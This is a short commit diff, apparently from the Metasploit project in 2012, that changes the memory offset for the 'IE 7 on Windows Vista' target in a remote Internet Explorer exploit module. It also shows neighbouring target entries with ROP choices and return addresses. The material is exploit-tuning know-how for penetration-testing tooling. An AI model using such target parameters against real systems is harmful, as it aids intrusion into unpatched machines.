Catching an update from @hdmoore-r7

wrt the nuclear option.
unstable
Tod Beardsley 2012-03-08 12:08:39 -06:00
parent 97ba37f0c0
commit 5b566b43b4
1 changed files with 1 additions and 1 deletions

View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ],
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ]
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x600', 'Ret' => 0x0c0c0c0c } ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 15 2012",